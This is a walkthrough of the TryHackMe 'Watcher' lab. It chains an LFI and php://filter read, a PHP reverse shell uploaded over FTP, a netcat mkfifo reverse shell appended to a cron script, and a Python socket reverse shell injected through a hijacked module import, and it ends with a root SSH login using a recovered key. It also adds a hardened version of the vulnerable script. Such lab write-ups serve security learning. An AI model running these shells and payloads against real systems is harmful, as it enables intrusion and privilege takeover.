
Watcher

https://tryhackme.com/room/watcher A boot2root Linux machine utilising web exploits along with some common privilege escalation techniques.

7 flags in this room

Wait 5 minutes for all services to start up on the system.

Starting off with nmap:

  • nmap -p- watcher.thm -vvv

We quickly run into a pretty simple LFI: /post.php?post=../../../etc/passwd pulls /etc/passwd and reveals the users mat and toby.

Scanning with gobuster reveals robots.txt, which leads us to flag 1.

We can then include /post.php?post=secret_file_do_not_read.txt and get the note with the FTP credentials ftpuser:givemefiles777.

  • /post.php?post=php://filter/convert.base64-encode/resource=post.php

Using the base64 filter to read the source shows this PHP script is just <?php include $_GET["post"]; ?>, so any path we pass is included without checks.

Inside the secret file was a note:

Hi Mat,

The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files.

Will

So if we upload a PHP reverse shell over FTP, we should be able to include it through the LFI, and we get a www-data shell.

sudo -l shows we can run any command as toby, so we get a toby shell with sudo -u toby bash and pick up the 4th flag in toby's home dir.

We missed a flag, so find / -name flag_3.txt 2>/dev/null locates it and we pick it up.

Mat left a note in toby's home dir:

Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

Mat

mat has a cron job running a script in toby's dir, /home/toby/jobs/cow.sh, under mat's privileges, and toby can append to it:

  • echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc localhost 6670 >/tmp/f" >> /home/toby/jobs/cow.sh

We can pick up flag 5 in mat's home, along with another note:

Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will

So we can run will_script.py with sudo as will, but it only accepts a whitelist of commands. Since cat is allowed, we might be able to read some interesting information.

import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
        print("Invalid command!")
        exit()

os.system(cmd)

This imports cmd.py from the script's own directory, so we can overwrite it with a Python reverse shell that executes as will.

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.2.3.64',6676));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py

  • sudo -u will python3 /home/mat/scripts/will_script.py cmd.py
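For contrast, here is how the whitelist runner could have been written so the trick above fails. This is an added example, not the room's file: the whitelist entries come from the page, while stat_is_trusted and the sys.path check are my additions.

```python
import os
import shlex
import subprocess
import sys

# The room's whitelist, stored as argument vectors so no shell parses user input.
WHITELIST = {
    "ls -lah": ["ls", "-lah"],
    "id": ["id"],
    "cat /etc/passwd": ["cat", "/etc/passwd"],
}

def resolve_command(user_input):
    """Map user text onto a whitelisted argv, or return None.
    shlex.split normalises whitespace ("cat  /etc/passwd" still matches), while
    "id; sh" or "cat /etc/shadow" never map onto an entry."""
    try:
        parts = shlex.split(user_input)
    except ValueError:  # unbalanced quotes
        return None
    return WHITELIST.get(" ".join(parts))

def stat_is_trusted(st_uid, st_mode):
    """Root-owned and not group- or world-writable."""
    return st_uid == 0 and (st_mode & 0o022) == 0

def path_is_trusted(path):
    """Apply stat_is_trusted to a file or directory on disk."""
    st = os.stat(path)
    return stat_is_trusted(st.st_uid, st.st_mode)

def run(user_input):
    # The original did 'from cmd import get_command'; Python resolves that from
    # sys.path[0], the script's own directory. If the sudo caller can write
    # there, cmd.py is attacker-controlled, so refuse to run unless the
    # directory is root-owned and read-only for everyone else.
    if not path_is_trusted(sys.path[0] or os.getcwd()):
        print("Refusing to run: script directory is writable by non-root users")
        return 2
    argv = resolve_command(user_input)
    if argv is None:
        print("Invalid command!")
        return 1
    # A list argv goes straight to execve: no shell=True, no os.system.
    return subprocess.run(argv, check=False).returncode

if __name__ == "__main__":
    sys.exit(run(sys.argv[1] if len(sys.argv) > 1 else ""))
```

With the script and its directory owned by root and mode 755, a cmd.py dropped by mat is never imported, and the sudo rule only ever reaches the three fixed argv lists.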

The hint for the last key is SSH, but trying find doesn't turn anything up, and scanning through linpeas I can't find much. In /opt/backups we find a base64-encoded key file. We can serve it with a python3 web server over to our attacking machine, decode it, and log in as root via SSH for the last flag:

  • base64 -d key > root_rsa && chmod 600 root_rsa
  • ssh root@watcher.thm -i root_rsa

And we win.

This post is licensed under CC BY 4.0 by the author.